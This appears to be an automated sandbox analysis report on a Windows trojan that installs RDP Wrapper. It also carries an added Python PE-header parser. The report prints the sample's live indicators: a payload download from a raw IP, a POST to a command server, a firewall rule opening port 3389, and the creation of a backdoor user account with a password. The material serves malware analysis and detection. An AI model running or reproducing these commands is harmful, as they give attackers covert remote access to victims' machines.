    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
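The response body above is the executable the sample fetches over plain HTTP (the RDP Wrapper installer that later runs as RDPWInst.exe -i). As an added example, not code from the report or from the sample, the following Python is a minimal DOS/PE header parser fed with those bytes. The header bytes are transcribed from the Data Raw excerpt; the run of zero bytes between the DOS stub and the PE header is reconstructed by padding up to e_lfanew (0x100), and the Content-Length constant is the value from the response headers. Everything the parser reports is derived from those bytes.

```python
"""Added example, not code from the report or from the sample: minimal DOS/PE
header parser, fed with the header bytes of the RDPWInst.exe download."""
import re
import struct
from datetime import datetime, timezone

# Header bytes transcribed from the report's "Data Raw" excerpt. The DOS stub
# ends at 0x78; the zero run up to e_lfanew (0x100) is rebuilt with padding.
_DOS_STUB = bytes.fromhex(
    "4d5a5000 02000000 04000f00 ffff0000 b8000000 00000000 40001a00 00000000"
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 00010000"
    "ba10000e 1fb409cd 21b8014c cd219090 54686973 2070726f 6772616d 206d7573"
    "74206265 2072756e 20756e64 65722057 696e3332 0d0a2437"
)
_PE_HEADER = bytes.fromhex(
    "50450000 4c010900 23d6435a 00000000 00000000 e0008e81"  # PE signature + COFF header
    "0b010219 00340400 00061700 00000000 3c370400 00100000 00500400"  # optional header
    "00004000 00100000 00020000 05000000 00000000 05000000 00000000"
    "00e01b00 00040000 17f61b00 03000000 00001000 00400000 00001000"
    "00100000 00000000 10000000"
    "00000000 00000000 00c00400 f8120000 00600500 ed7b1600 00000000 00000000"  # 16 data dirs
    "00000000 00000000 00000500 fc5e0000 00000000 00000000 00000000 00000000"
    "00000000 00000000 00f00400 18000000 00000000 00000000 00000000 00000000"
    "e8c30400 d0020000 00000000 00000000 00000000 00000000 00000000 00000000"
)
# Section rows: name, VirtualSize VirtualAddress SizeOfRawData PointerToRawData, Characteristics
_SECTION_ROWS = [
    ("2e746578 74000000", "20120400 00100000 00140400 00040000", "20000060"),  # .text
    ("2e697465 78740000", "7c1e0000 00300400 00200000 00180400", "20000060"),  # .itext
    ("2e646174 61000000", "78120000 00500400 00140000 00380400", "400000c0"),  # .data
    ("2e627373 00000000", "c04f0000 00700400 00000000 004c0400", "000000c0"),  # .bss
    ("2e696461 74610000", "f8120000 00c00400 00140000 004c0400", "400000c0"),  # .idata
    ("2e746c73 00000000", "10000000 00e00400 00000000 00600400", "000000c0"),  # .tls
    ("2e726461 74610000", "18000000 00f00400 00020000 00600400", "40000040"),  # .rdata
    ("2e72656c 6f630000", "fc5e0000 00000500 00600000 00620400", "40000042"),  # .reloc
    ("2e727372 63000000", "ed7b1600 00600500 007c1600 00c20400", "40000040"),  # .rsrc
]
SAMPLE_HEADERS = (
    _DOS_STUB + b"\0" * (0x100 - len(_DOS_STUB)) + _PE_HEADER
    + b"".join(bytes.fromhex(n + v + "00" * 12 + c) for n, v, c in _SECTION_ROWS)
)
REPORTED_CONTENT_LENGTH = 1785344  # Content-Length from the response headers above


def parse_pe_headers(data: bytes) -> dict:
    """Parse DOS header, COFF header, PE32/PE32+ optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    stub = re.search(rb"[ -~]{8,}", data[0x40:e_lfanew])  # printable DOS-stub message
    coff = e_lfanew + 4
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, lmaj, lmin, _, _, _, entry = struct.unpack_from("<HBBIIII", data, opt)
    if magic == 0x10B:    # PE32: BaseOfData precedes a 32-bit ImageBase
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:  # PE32+: no BaseOfData, 64-bit ImageBase
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # same offset in both formats
    sections = []
    for i in range(nsec):
        row = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": row[0].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": row[1], "virtual_address": row[2],
                         "raw_size": row[3], "raw_pointer": row[4],
                         "characteristics": row[9]})
    return {
        "machine": machine, "number_of_sections": nsec, "timestamp": ts,
        "compiled_utc": datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "characteristics": chars, "is_dll": bool(chars & 0x2000),
        "linker_version": (lmaj, lmin), "entry_point_rva": entry,
        "image_base": image_base, "subsystem": subsystem,
        "dos_stub_text": stub.group().decode() if stub else "",
        "sections": sections,
        # End of the last section's raw data: the file size without any overlay,
        # which a complete download must reach.
        "expected_file_size": max((s["raw_pointer"] + s["raw_size"] for s in sections), default=0),
    }


def download_is_complete(info: dict, content_length: int) -> bool:
    """True when the section table accounts for exactly the bytes the server announced."""
    return info["expected_file_size"] == content_length


if __name__ == "__main__":
    info = parse_pe_headers(SAMPLE_HEADERS)
    for key in ("machine", "compiled_utc", "linker_version", "subsystem", "dos_stub_text"):
        print(f"{key}: {info[key]}")
    print("sections:", [s["name"] for s in info["sections"]])
    print("complete download:", download_is_complete(info, REPORTED_CONTENT_LENGTH))
```

The .rsrc section's raw data ends at 0x4c200 + 0x167c00 = 0x1b3e00 = 1785344, exactly the Content-Length the server sent (nginx also encodes that size in hex as the second half of the ETag), so the capture is a complete PE with no overlay. The MZP stub with its "This program must be run under Win32" message, linker version 2.25, console subsystem and the .itext/.bss/.tls section layout are the usual marks of a Delphi-built executable, consistent with the JoeSecurity_DelphiSystemParamCount Yara hit on RDPWInst.exe.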
Source: global traffic | HTTP traffic detected:
    POST /receive.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: hansgborn.eu
    Content-Length: 193
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
    Host: 147.45.44.104
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: api.ipify.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: api.ipify.org
Source: Joe Sandbox View | IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View | IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View | IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View | ASN Name: AS-PUBMATICUS AS-PUBMATICUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 104.26.12.205:80
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,8_2_0043CF60
                            Source: global traffic | HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
                            Source: global traffic | DNS traffic detected: DNS query: hansgborn.eu
                            Source: unknown | HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 193Expect: 100-continueConnection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:23:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n78Cuf5jALD%2BIbhiTCL4zbEwvNVt7zS7jEAlYva6PGfsrEFdGWZ5N3o80l8KBOuvC9cd%2FGlXNVidCcCS5S7I%2Fs3dcjDUXlBY9rTtQnB2KT6vpZPClKSJuOLsjYLOJus%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cf253cb5d417c8d-EWR92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.104
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.orgd
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://hansgborn.eu
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://hansgborn.eud
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: RDPWInst.exe, RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | String found in binary or memory: http://stascorp.com/load/1-1-0-62
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.8.dr | String found in binary or memory: http://stascorp.comDVarFileInfo$
                            Source: Amcache.hve.38.dr | String found in binary or memory: http://upx.sf.net
                            Source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | String found in binary or memory: http://www.apache.org/licenses/
                            Source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hansgborn.eu
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hansgborn.eu/receive.php
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hansgborn.eu/receive.phpd
                            Source: RDPWInst.exe | String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                            Source: RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                            Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | File created: C:\Windows\System32\rfxvmt.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Code function: 0_2_02ADA168 0_2_02ADA168
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Code function: 0_2_02AD9150 0_2_02AD9150
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Code function: 0_2_02AD9498 0_2_02AD9498
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0040360C 8_2_0040360C
                            Source: Joe Sandbox View | Dropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: String function: 00406BE0 appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: String function: 00404CDC appears 74 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: String function: 00407450 appears 135 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: String function: 004042F8 appears 74 times
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRDPWInst.exeB vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamerfxvmt.dllj% vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRDPCreator.exe4 vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOpen.Nat.dll2 vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe | Binary or memory string: OriginalFilenameRDPCreator.exe4 vs hloRQZmlfg.exe
                            Source: unknown | Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                            Source: hloRQZmlfg.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: hloRQZmlfg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: hloRQZmlfg.exe, QXNzZW1ibHlMb2FkZXJB.cs | Base64 encoded string: 'w75gTK5M6nzjTjnU+EoLi93dybDJuhTv6xUfacOqvm3ntZls9kVKGw==', 'GIKjK8lRUDXDvmBMrkzqfONOOdT4SguL3d3JsMm6FO/rFR9pw6q+bdiuJS1yJj2wOTluGm4Gl9mQZennlkDvjw=='
                            Source: hloRQZmlfg.exe, UkRQSW5zdGFsbGVyQUFB.cs | Base64 encoded string: 'Jgk+cpobi4HBt1lw0WE9XNJ89TCIzlhBNL/zJLRgBlm9Fes8fLy7lOqxaoMMFYu4h05s9jjqJGLgjuTH0E+V5A==', 'Jgk+cpobi4HBt1lw0WE9XNJ89TCIzlhBNL/zJLRgBlm9Fes8fLy7lOqxaoMMFYu4h05s9jjqJGLgjuTH0E+V5A==', 'JehuIqkfsZQn0wkdwp2Nv/y8T+57Hbz4jwTgsn8AMlfxiUVZPRQx54pSXRY9M8JQ2umoxBO/Qdf/mHep3Ig9TJeUj4V6VmCFYjcojSKP1YckClxyst9NgCfGZwdRs5kQOl2e24zkqDU='
                            Source: hloRQZmlfg.exe, U3lzdGVtSW5mb0FB.cs | Base64 encoded string: 'U2dyW+WlE2YacbhqD8LQw/dYBPvUOuPoVsunzrPAfQoHVJJcYxfAV2E0Ximq0mTO24Gft0ff19E6XZ7bjOSoNQ==', 'Xq8So407SNKAzRfCmuKT/ly3DrFODnX5uyrwLzvgmMo6XZ7bjOSoNQ==', 'Xq8So407SNLaCDu3SJO0Fc9Z8WHbi8GwQ2lpakbFuh4TfVtQ1EKwfULNkulliuVh', 'Xq8So407SNKAzRfCmuKT/kOCDYZigawGtO0vHjFlULSJJMEG9cpg/A==', 'Hvsa0AhhunjG28J8qAHgRJENLhIM1RWb/F5T453A6UKDTIehOAc8i41KEtlAK0ui', 'Q7n1HoDaVCNv7RNvVd9BtzWPUPtXLvcOQk9qkg0DAsLpFtHAxn6PWy8NKefrC0og'
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000F16000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AutomaticEngineRollbackMode;.VBP
                            Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@38/13@2/5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,8_2_0043BF00
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0040FAE8 GetDiskFreeSpaceW,8_2_0040FAE8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,8_2_0043DC64
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,8_2_0043B1A8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | File created: C:\Program Files\RDP Wrapper
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2444
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                            Source: Yara match | File source: 8.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000000.1434233686.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: hloRQZmlfg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: hloRQZmlfg.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: hloRQZmlfg.exe | ReversingLabs: Detection: 63%
                            Source: hloRQZmlfg.exe | Virustotal: Detection: 71%
                            Source: RDPWInst.exe | String found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                            Source: unknown | Process created: C:\Users\user\Desktop\hloRQZmlfg.exe "C:\Users\user\Desktop\hloRQZmlfg.exe"
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net user
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
